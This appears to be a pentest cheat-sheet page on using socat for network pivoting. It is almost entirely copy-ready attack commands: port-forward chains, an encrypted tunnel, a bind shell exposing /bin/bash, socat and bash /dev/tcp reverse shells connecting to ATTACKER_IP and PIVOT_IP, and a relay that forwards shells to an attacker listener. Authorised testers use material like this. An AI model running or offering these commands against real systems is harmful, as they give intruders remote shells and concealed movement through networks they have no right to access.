Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Install
Standalone binary: https://github.com/andrew-d/static-binaries
Port Forward (TCP Redirect)
Forward traffic from one port to another host.
socat TCP-LISTEN:8080,fork TCP:TARGET_IP:80
PIVOT:8080 → reaches TARGET_IP:80.
Background
socat TCP-LISTEN:8080,fork TCP:TARGET_IP:80 &
Reverse Shell Relay
Attacker — Listener
Pivot — Relay
socat TCP-LISTEN:9999,fork TCP:ATTACKER_IP:4444
Target — Connect
bash -i >& /dev/tcp/PIVOT_IP/9999 0>&1
Port Forward Chain
# Pivot1: forward 8080 → Pivot2:9090
socat TCP-LISTEN:8080,fork TCP:PIVOT2_IP:9090
# Pivot2: forward 9090 → Internal:80
socat TCP-LISTEN:9090,fork TCP:INTERNAL_IP:80
Encrypted Tunnel (OpenSSL)
Generate Cert
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out cert.pem
cat key.pem cert.pem > socat.pem
Encrypted Listener
socat OPENSSL-LISTEN:443,cert=socat.pem,verify=0,fork TCP:TARGET_IP:80
Encrypted Client
socat TCP-LISTEN:8080,fork OPENSSL:PIVOT_IP:443,verify=0
Bind Shell
Target
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash,pty,stderr,setsid,sigint,sane
Attacker
socat FILE:`tty`,raw,echo=0 TCP:TARGET:4444
Reverse Shell
Attacker
socat FILE:`tty`,raw,echo=0 TCP-LISTEN:4444
Target
socat TCP:ATTACKER_IP:4444 EXEC:/bin/bash,pty,stderr,setsid,sigint,sane
UDP Forward
socat UDP-LISTEN:53,fork UDP:DNS_SERVER:53
Quick Reference
| Task | Command |
|---|
| TCP forward | socat TCP-LISTEN:PORT,fork TCP:TARGET:PORT |
| Reverse relay | Listen on pivot, forward to attacker |
| Encrypted | socat OPENSSL-LISTEN:443,cert=socat.pem... |
| Bind shell | socat TCP-LISTEN:4444... EXEC:/bin/bash,pty... |